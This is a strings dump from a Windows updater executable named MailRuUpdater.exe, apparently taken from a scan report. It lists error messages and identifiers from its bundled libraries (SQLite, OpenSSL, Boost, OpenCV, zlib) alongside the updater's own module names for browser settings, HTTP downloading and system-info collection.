D:\Libs\opencv\sources\modules\core\src\stat.cpp
mask.empty() || mask.type() == CV_8U
mask.empty() || mask.type() == CV_8UC1
dst.type() == CV_64F && dst.isContinuous() && (dst.cols == 1 || dst.rows == 1) && dcn >= cn
D:\Libs\opencv\sources\modules\core\src\mathfuncs.cpp
!)>D:\Libs\opencv\sources\modules\core\src\dxt.cpp
type == srcB.type() && srcA.size() == srcB.size()
D:\Libs\opencv\sources\modules\core\src\umatrix.cpp
D:\Libs\opencv\sources\modules\core\src\array.cpp
_dst.data == data0
NULL array pointer is passed
Unrecognized or unsupported array type
unrecognized or unsupported array type
Only continuous nD arrays are supported here
Unsupported format
rect.width >= 0 && rect.height >= 0 && rect.x < image->width && rect.y < image->height && rect.x   rect.width >= (int)(rect.width > 0) && rect.y   rect.height >= (int)(rect.height > 0)
D:\Libs\opencv\sources\modules\core\src\datastructs.cpp
D:\Libs\opencv\sources\modules\core\include\opencv2/core/private.cuda.hpp
The library is compiled without CUDA support
D:\Libs\opencv\sources\modules\core\src\opengl.cpp
The library is compiled without OpenGL support
OpenCL.dll
D:\Libs\opencv\sources\modules\core\src\matmul.cpp
type == B.type() && (type == CV_32FC1 || type == CV_64FC1 || type == CV_32FC2 || type == CV_64FC2)
a_size.width == len
a_size.height == len
C.type() == type && (((flags&GEMM_3_T) == 0 && C.rows == d_size.height && C.cols == d_size.width) || ((flags&GEMM_3_T) != 0 && C.rows == d_size.width && C.cols == d_size.height))
type == _src2.type()
src1.size == src2.size
src.channels() == 1
delta.channels() == 1 && (delta.rows == src.rows || delta.rows == 1) && (delta.cols == src.cols || delta.cols == 1)
D:\Libs\opencv\sources\modules\core\src\lapack.cpp
type == _src2.type() && (type == CV_32F || type == CV_64F)
(method != DECOMP_LU && method != DECOMP_CHOLESKY) || is_normal || src.rows == src.cols
src.rows == src.cols
w.type() == u.type() && u.type() == vt.type() && u.data && vt.data && w.data
u.cols >= nm && vt.rows >= nm && (w.size() == Size(nm, 1) || w.size() == Size(1, nm) || w.size() == Size(vt.rows, u.cols))
rhs.data == 0 || (rhs.type() == type && rhs.rows == m)
D:\Libs\opencv\sources\modules\core\src\persistence.cpp
-.Inf
An attempt to add element without a key to a map, or add element with key to sequence
The key is an empty
The key is too long
Key must start with a letter or _
Key names may only contain alphanumeric characters [a-zA-Z0-9], '-', '_' and ' '
Key should start with a letter or _
Key name may only contain alphanumeric characters [a-zA-Z0-9], '-' and '_'
elements with keys can not be written to sequence
Images with planar data layout are not supported
2if%s
ß%s
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.
Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
boost::filesystem::directory_iterator::operator  
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
libs\log\src\code_conversion.cpp
libs\log\src\global_logger_storage.cpp
libs\log\src\attribute_name.cpp
[u-u-u u:u:u.u] [%s] %s %s
[u-u-u u:u:u.u] [%s] %s %ls
libs\log\src\thread_specific.cpp
Resource.cpp
%Y-%m-%d %H:%M:%S
en_US.UTF-8
log_ng.cpp
mailru::log_ng::ExecutionTimeLogger::~ExecutionTimeLogger
is_admin.cpp
c:\desktop_apps\sputniklib\auto_handle.hpp
process_enumerate.cpp
GetModuleFileNameEx succeed %s
Path.cpp
remote_config.cpp
string.cpp
version_info.cpp
AccountInfo.cpp
mailru::sqlite::database::database
sqlite.cpp
<>"#%{}|\^~[] ?&@=:,
hXXp://
hXXps://
process_util.cpp
unzip.cpp
filesystem_utils.cpp
mailru::firefox_js_core::load_prefs_js
firefox_js.cpp
!"#$%&'(
)* ,-./0123
encryption.cpp
testing_env.cpp
SessionsInfo.cpp
mailru::WaitForUserLogIn
Suggest URL
mailru::opera::searchini::save
opera_searchini.cpp
sync_objects.cpp
uninstall_manager.cpp
mailru::url_parser::init
url_parser.cpp
system_info\system_info_collector.cpp
crash_handler.cpp
shortcut.cpp
thread.entry_event
thread.exit_event
mailru::http::request_headers::get_header
C:\desktop_apps\SputnikLib/http_downloader.h
HTTP/1.1
^HTTP/1.1 (\d ) (. )
mailru::http::response_headers::response_headers
mailru::http::response_headers::get_file_time
http_downloader.cpp
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader_impl::handle_read_headers
mailru::http::raw::downloader::fetch_file_attributes
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
system_info\system_info.cpp
s-sputnik.mail.ru
hXXps://VVV.geotrust.com/resources/root_certificates/certificates/Equifax_Secure_Certificate_Authority.pem
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
255.255.255.255
asio.ssl
asio.ssl error
add_certificate_authority
https
HTTP error:
caching_policy.cpp
task_scheduler.cpp
Line %d, Column %d
Visual C   CRT: Not enough memory to complete call to strerror.
%S#[k
?#%X.y
MaxPolicyElementKey
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
pExecutionResource
SQLite format 3
3.7.11
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
foreign_keys
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
sqlite_stat1
SQL logic error or missing database
unknown operation
large file support is disabled
RowKey
sqlite_detach
sqlite_attach
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
c:\desktop_apps\3party\ticpp\ticpp.h
ticpp.cpp
Type is unsupported
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
type="%s"
href="%s"
unsupported version
.UTF-8
.windows-
windows1250
windows1251
windows1252
windows1253
windows1254
windows1255
windows1256
windows1257
windows874
windows932
windows936
Invalid or unsupported charset:
1.2.5
<fd:%d>
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
RSA PRIVATE KEY
PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
NETSCAPE_CERT_SEQUENCE
RIPE-MD160 part of OpenSSL 1.0.0g 18 Jan 2012
SHA part of OpenSSL 1.0.0g 18 Jan 2012
MD4 part of OpenSSL 1.0.0g 18 Jan 2012
CAST part of OpenSSL 1.0.0g 18 Jan 2012
Blowfish part of OpenSSL 1.0.0g 18 Jan 2012
:RC2 part of OpenSSL 1.0.0g 18 Jan 2012
.pp@0
aEÐ
 (#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.0g 18 Jan 2012
libdes part of OpenSSL 1.0.0g 18 Jan 2012
DES part of OpenSSL 1.0.0g 18 Jan 2012
3OpenSSL 1.0.0g 18 Jan 2012
GOST signature length is %d
.\ssl\ssl_cert.c
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for key agreement
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_ADD_CERT_TO_BUF
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_ADD_CERT_TO_BUF
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
SSLv2 part of OpenSSL 1.0.0g 18 Jan 2012
s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)
c->iv_len <= (int)sizeof(s->session->key_arg)
s->s2->key_material_length <= sizeof s->s2->key_material
SSLv3 part of OpenSSL 1.0.0g 18 Jan 2012
TLSv1 part of OpenSSL 1.0.0g 18 Jan 2012
os.length <= (int)sizeof(ret->session_id)
DTLSv1 part of OpenSSL 1.0.0g 18 Jan 2012
key expansion
client write key
server write key
%s:%d: rec->data != rec->input
libs\log\src\text_file_backend.cpp
%H:%M:%S.%f
.\crypto\engine\eng_pkey.c
Load certs from files in a directory
%s%clx.%s%d
unsupported type
unsupported recpientinfo type
unsupported recipient type
unsupported kek algorithm
unsupported content type
signer certificate not found
private key does not match certificate
no public key
no private key
no msgsigdigest
no key or cert
no key
not supported for this key type
not key transport
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest error
invalid key length
invalid encrypted key length
error setting key
error getting public key
certificate verify error
certificate has no keyid
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add0_recipient_key
CMS_add0_cert
unsupported requestorname type
no certificates in chain
error parsing url
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_cert_id_new
unimplemented public key method
invalid cmd number
invalid cmd name
failed loading public key
failed loading private key
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
unsupported md algorithm
invalid signer certificate purpose
ess signing certificate error
ess add signing cert error
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
functionality not supported
WIN32_JOINER
unsupported pkcs12 mode
key gen error
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_add_localkeyid
unsupported option
unable to get issuer keyid
policy syntax not currently supported
operation not defined
no proxy cert policy language defined
no issuer certificate
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
unsupported cipher type
unable to find certificate
signing not supported for this key type
operation not supported on this type
no recipient matches key
no recipient matches certificate
encryption not supported for this key type
decrypted key is wrong length
PKCS7_add_certificate
unsupported method
no port specified
no port defined
no accept port specified
BIO_get_port
ECDH_compute_key
data too large for key size
unsupported field
passed null parameter
not a supported NIST prime
missing private key
keys not set
invalid private key
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
o2i_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
EC_KEY_print_fp
EC_KEY_print
EC_KEY_new
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
d2i_ECPrivateKey
zlib not supported
wrong public key type
unsupported public key type
unsupported encryption algorithm
unsupported any defined by type
unknown public key type
unable to decode rsa private key
unable to decode rsa key
streaming not supported
private key header missing
digest and key type not supported
bad password read
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PrivateKey
d2i_AutoPrivateKey
unsupported algorithm
unknown key type
unable to get certs public key
public key encode error
public key decode error
no cert set for us to verify
method not supported
loading cert dir
key values mismatch
key type mismatch
cert already in hash table
cant check dh key
X509_verify_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_check_private_key
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
unsupported key components
unsupported encryption
read key
public key no rsa
problems getting password
keyblob too short
keyblob header parse error
expecting public key blob
expecting private key blob
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
unsupported salt type
unsupported private key algorithm
unsupported prf
unsupported key size
unsupported key derivation function
unsupported keylength
unsuported number of rounds
private key encode error
private key decode error
operaton not initialized
operation not supported for this keytype
no operation set
no key set
keygen failure
invalid operation
expecting a ec key
expecting a ecdsa key
expecting a dsa key
expecting a dh key
expecting an rsa key
different key types
ctrl operation not implemented
command not supported
camellia key setup failed
bn pubkey error
bad key length
aes key setup failed
PKEY_SET_TYPE
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
GENERATE_KEY
COMPUTE_KEY
rsa operations not supported
key size too small
invalid keybits
illegal or unsupported padding mode
digest too big for rsa key
data too small for key size
RSA_generate_key
RSA_check_key
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
.\crypto\asn1\x_pkey.c
C:\desktop_apps\_out\MailRuUpdater.pdb
MailRuUpdater.exe
??0?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@QAE@XZ
??0?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@QAE@XZ
??0?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@QAE@XZ
??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ@51
??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ@51
